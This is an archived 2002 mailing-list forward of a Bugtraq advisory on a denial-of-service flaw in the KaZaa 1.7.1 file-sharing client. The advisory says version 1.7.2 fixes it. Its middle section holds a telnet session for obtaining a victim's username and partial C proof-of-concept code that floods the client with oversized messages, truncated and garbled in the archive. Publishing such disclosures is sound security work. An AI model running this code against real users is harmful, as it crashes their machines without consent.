Security News > 2002 > July > FC: Just in time for P2P-hacking bill: Disrupting KaZaa clients
---------- Forwarded message ---------- Date: Fri, 26 Jul 2002 01:56:07 -0400 From: Declan McCullagh To: politech () politechbot com Subject: FC: Just in time for P2P-hacking bill: Disrupting KaZaa clients Previous Politech message: "Peer-to-peer hacking bill officially introduced in House" http://www.politechbot.com/p-03795.html --- From: "Richard M. Smith" To: Subject: Just in time for the Berman bill! Date: Thu, 25 Jul 2002 20:46:38 -0400 FYI: -----Original Message----- From: josh () pulltheplug com [mailto:josh () pulltheplug com] Sent: Thursday, July 25, 2002 1:58 AM To: bugtraq () securityfocus com Subject: KaZaa v1.7.1 Denial of Service Attack Submitted by : Josh (josh () pulltheplug com), omega (mtwoar () hotmail com) on July 25th, 2002 Vulnerability : KaZaa Denial of Service Attack Tested On : KaZaa v1.7.1 Remote : Yes Fix : KaZaa v1.7.2 has been released and is a fix for the problem Big Thanks To : SooT for letting me crash your system a lot. Greets to : SooT, zen-parse, arcanum, lockdown, brian, Bryan S., #social on ptp, Jade There exists a denial of service attack in KaZaa Media Desktop file sharing utility that allows an attacker to force CPU usage to rise to 100% upon sending large messages to the victim. Basically it seems to have the same effect as opening an exceptionally large text file in some text editor. The added bonus is the decryption that is performed on the message, which adds to the CPU usage. Exploitation merely requires the I.P. of the victim and a username. The username can be obtained as such: $ telnet 1214 Trying ... Connected to . Escape character is '^]'. GET / HTTP/1.1 // My input HTTP/1.0 404 Not Found // Server output X-Kazaa-Username: X-Kazaa-Network: KaZaA X-Kazaa-IP: :1214 X-Kazaa-SupernodeIP: :1214 Connection closed by foreign host. Assuming you and the receiving user have the bandwidth to transmit and receive the message before the connection to the user's kazaa server times out, a good proof of concept length is 20 messages at 100 iterations of the 4026 byte message tell... 300 iterations 20 times will make it pretty evident. /* kazaa denial of service attack by Josh and omega */ #include #include #include #include #include #include #include #include #include #include #define PORT 1214 int main(int argc, char *argv[]) { int fd, numbytes, randnum, k; struct hostent *host; struct sockaddr_in them; char buf2[4026]; char buf[5000]; char *bigboy; int i, size, j; memset(buf2, 'a', sizeof(buf2)); buf2[sizeof(buf2)-1]='\0'; srand(time(NULL)); if (argc \n", argv[0]); exit(1); } if ((host=gethostbyname(argv[1])) == NULL) { perror("gethostbyname"); exit(1); } them.sin_family = AF_INET; them.sin_port = htons(PORT); them.sin_addr = *((struct in_addr *)host->h_addr); memset(&(them.sin_zero), '\0', 8); size=(4042*atoi(argv[2]))+280+1; bigboy=(char *)malloc(size); snprintf(bigboy, size, "GET /.message HTTP/1.1\nHost: 68.10.112.148:1214\nUserAgent: KazaaClient Jan 18 2002 18:53:21\nX-Kazaa-Username: 31337h4x0r\nX-Kazaa-Network: KaZaA\nX-Kazaa-IP: %d:1214\nX-Kazaa-SupernodeIP: %d:1214\nConnection: open\nX-Kazaa-IMTo: %s () KaZaA\nX-Kazaa-IMType: user_text\n", randnum, randnum, argv[3]); /* the msg appears as one msg to the receiver, but comes in intervals of 4096 bytes... */ snprintf(buf, sizeof(buf), "X-Kazaa-IMData: %s\n", buf2); for(k=0;k Paranoia is simply an optimistic outlook on life. Organized people are just too lazy to look for stuff. Killer animals zap animals again in slimey sludge. People yack when a root evades. While observing moths frantically try to enter a light bulb I have been able to extract and algorithm to describe their movements. Fat people are harder to kidnap. ------------------------------------------------------------------------- POLITECH -- Declan McCullagh's politics and technology mailing list You may redistribute this message freely if you include this notice. To subscribe to Politech: http://www.politechbot.com/info/subscribe.html This message is archived at http://www.politechbot.com/ Declan McCullagh's photographs are at http://www.mccullagh.org/ ------------------------------------------------------------------------- Like Politech? Make a donation here: http://www.politechbot.com/donate/ ------------------------------------------------------------------------- - ISN is currently hosted by Attrition.org To unsubscribe email majordomo () attrition org with 'unsubscribe isn' in the BODY of the mail.